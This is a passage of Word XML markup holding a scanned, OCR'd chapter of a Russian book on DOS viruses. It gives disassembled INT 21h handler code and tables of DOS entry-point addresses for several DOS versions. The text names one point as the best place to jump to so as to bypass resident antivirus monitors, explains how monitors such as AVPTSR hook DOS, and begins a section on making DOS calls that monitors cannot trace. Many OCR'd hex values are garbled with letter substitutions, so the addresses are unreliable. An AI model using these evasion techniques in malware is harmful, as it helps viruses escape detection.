        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>3A26FFOD СМР AH,[ODFF]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>77DC JA 1443</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>80FC51 СМР АН,51</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">74А1 JZ 140D </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>80FC64 СМР АН,64</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>74ВА JZ 143A</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;Точка 2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Оригинальные обработчики DOS версий 5.0-7.0 очень похожи.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">В общем случае они состоят из следующих фрагментов: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Фрагмент 1 (если он присутствует) всегда располагается в нижних ад-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ресах памяти. Большинство алгоритмов трассировки заканчивают рабо-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ту, достигнув этой точки. Для DOS версий 5.0-6.22 этот фрагмент при-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>сутствует, если в CONFIG.SYS есть строка DOS=HIGH (вне</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>зависимости от того, осуществляется ли запуск поддерживающего эту</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">опцию драйвера HIMEM.SYS). Если драйвера нет, то JMP FAR просто </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>указывает на фрагмент 2, размещающийся в нижних областях памяти.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Если строки DOS=HIGH нет, то фрагмент 1 вырожден (состоит из од-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ной команды внутрисегментного перехода), и обработчик состоит</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">из фрагмента 2. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;Точка О </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">90 МОР </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">90 NOP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E8CCOO CALL CheckA20 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2E CS: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FF2E6A10J MP FAR NEXTDOS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Фрагмент 2 может располагаться как в верхних, так и в нижних адре-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">сах памяти. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Точка 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">NEXTDOS: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>FA CLI</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>80FC6C СМР АН.6С</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">77D2 JA 40DO </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>80FC50 СМР АН.50</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>748Е JZ 40A9</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;Точка 2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Для DOS 7.0 структура обработчика, в общем, такая же. Исключение -</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>фрагмент 1 присутствует всегда, вне зависимости от содержимого фай-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ла CONFIG.SYS. Теперь приведем конкретные значения адресов, полу-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ченные для разных случаев: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOS 7.0 (русская версия)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Точка О OOC9:OFB2 9090</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 1 FF03:41E7 80FA</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 2 FF03:420A 1E06</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Точка 2А FF03:5333 2ACD </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOS 6.20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>device=himem. sys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>dos=high</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Точка О 0123:109Е 9090</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 1 FDC8:40F8 80FA</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 2 FDC8:411B1E06</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Точка 2А FDC8:41D12ACD </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6.20</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">dos=high </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Точка О 0123:109Е ОЗЕВ</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 1 03AC:40F8 80FA</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 2 ОЗАС:411В 1Е06</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Точка 2А 03AC:41D1 2ACD </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOS 6.20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Точка 1 002A:40F8 SOFA</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 2 002А:411В 1Е06</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Точка 2А 002A:41D1 2ACD </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOS 5.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>device=himem. sys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>dos=high</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Точка О 0123:109Е 9090</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 1 FDC8:40EB80FA</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 2 FDC8:410E 1Е06</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Точка 2А FDC8:41C42ACD </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOS 5.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dos=high </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Точка О 0123:109Е ОЗЕВ</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 1 03AC:40F8 80FA</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 2 ОЗАС:411В 1Е06</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Точка 2А 03AC:41D1 2ACD </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5.0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Точка 1 002А:40ЕВ 80FA</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 2 002А:410Е 1Е06</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Точка 2А 002A:41D1 2ACD </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOS 3.30</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Точка О 0070:05DC 892E</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 1 0294:1460 ЗА2Е</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 2 0294:1480</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Точка 2А 0294:151 В 2ACD </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOS 3.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Точка О 0070:OD43 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOS 3.20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Точка 0 0070:17DO </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Точка 2 является оптимальной, то есть в нее целесообразнее всего пере-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>давать управление, чтобы обойти резидентные антивирусные мониторы.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точка 2А - это позиция инструкции INT 2Ah, которую DOS обязатель-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">но выполняет в процессе обработки 21-го прерывания. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>В конце каждой строки приведены контрольные слова - на тот случай,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">если по указанному адресу находится нечто иное. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Борьба с антивирусными мониторами</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Современные антивирусные мониторы умеют отслеживать факт прямо-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">го обращения программ к DOS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Защиту 21-го прерывания можно организовать более эффективно, ис-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>пользуя метод встраивания в ядро операционной системы. Общеприня-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>тая схема такова: в точку входа прерывания INT 21h записывается инст-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>рукция JMP FAR на обработчик, который проверяет номер функции на</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>безопасность. Он восстанавливает оригинальные инструкции в точке вхо-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>да прерывания и вызывает обработчик INT 21h. После возврата управле-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ния из прерывания, в точку входа снова записывается инструкция JMP</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">FAR, и управление передается программе, вызвавшей INT 21h. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Здесь описан обычный "сплайсинг" (встраивание), который широко</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>применяется разработчиками вирусов. Отметим, что для перехода не</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>обязательно использовать инструкцию JMP FAR (она занимает 5 байт</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>в памяти и не везде может быть размещена). Вместо нее можно приме-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>нить INT 3, затратив всего 1 байт. В то же время необходимо обеспе-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>чить обработку вызовов с кодами OOh, 4Ch, 31h (они не возвращают уп-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>равление в исходную точку), а также самовызовов (при завершении</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">процессов посредством INT 27h и INT 20h). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Процесс развивается следующим образом. Первый компонент антивирус-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ного монитора встраивается в ядро DOS, а второй - просто перехватыва-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ет цепочку 21-го прерывания. Когда программа выполняет инструкцию</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>INT 21h, управление передается второму компоненту. У антивирусных</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>мониторов существует список функций, которые воспринимаются ими</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>как опасные. Они могут сделать проверку на наличие заданной функ-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ции в этом списке, затем выставить флаг "проход цепочки" и передать</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>управление дальше. Когда первый компонент получает управление, он</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>проверяет флаг "прохода цепочки". Если он выставлен, то была инст-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>рукция INT 21h, поэтому необходимо сбросить флаг "проход цепочки"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">и передать управление в DOS. Если флаг сброшен, это значит, что был </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5 - 1436 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>выполнен прямой вызов. В этом случае требуется принимать соответ-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ствующие меры против возможных действий вируса. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Эта идея исключительно проста и эффективна. В том или ином виде ее</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>применяют почти все современные антивирусные мониторы. Вот один</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">из таких вариантов. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>После трассировки прерывания выполняется обращение к DOS по</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>оригинальному адресу. Программа AVPTSR перехватывает обращение.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Точнее, AVPTSR перехватывает INT 2Ah, причем этот вызов произве-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ден из INT 21h, вблизи начала фрагмента. Обработчик INT 08h,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>то есть таймера, периодически восстанавливает вектор 2Ah, если он</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">был отключен. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Подразумевается, что флаг прохода цепочки 21-го прерывания проверя-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ется в обработчике INT 2Ah. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Конструирование неотслеживаемого обращения к DOS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Для чего нужно такое конструирование? Неужели антивирусные мони-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>торы настолько бдительны, что пресекают любые попытки открыть для</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>модификации ЕХЕ- или СОМ-файл? Да, это действительно так. Авто-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ры антивирусных мониторов обладают достаточно эффективными сред-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ствами, чтобы предотвратить прямые обращения к DOS со стороны ви-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">русов. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Обратимся к мнению Ю. Косивцова: "Для обнаружения действия нере-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>зидентных вирусов необходимо контролировать вызов функций DOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>с номерами: 3Dh (открытие файла через описатель), OFh (открытие</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>файла через FCB и 5Dh) и подфункцию OOh (косвенный вызов DOS).</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Если при открытии файла обнаружено, что расширение его СОМ, ЕХЕ</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">или SYS, то можно выдавать предупреждающее сообщение". </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Список выглядит слишком коротким. Действительно, а что произойдет,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>если сначала переименовать программный файл? И почему не учтена</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>функция 6Ch (расширенное открытие файла)? А что будет, если от-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>крыть файл для чтения, а затем изменить режим доступа прямым обра-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">щением к SFT? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Конечно же, авторы антивирусных мониторов не столь наивны. Просто</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>они никогда не раскрывают свои профессиональные секреты. Например,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>авторы программы AVPTSR реально учли и использовали все эти мето-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">дики и тонкости. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
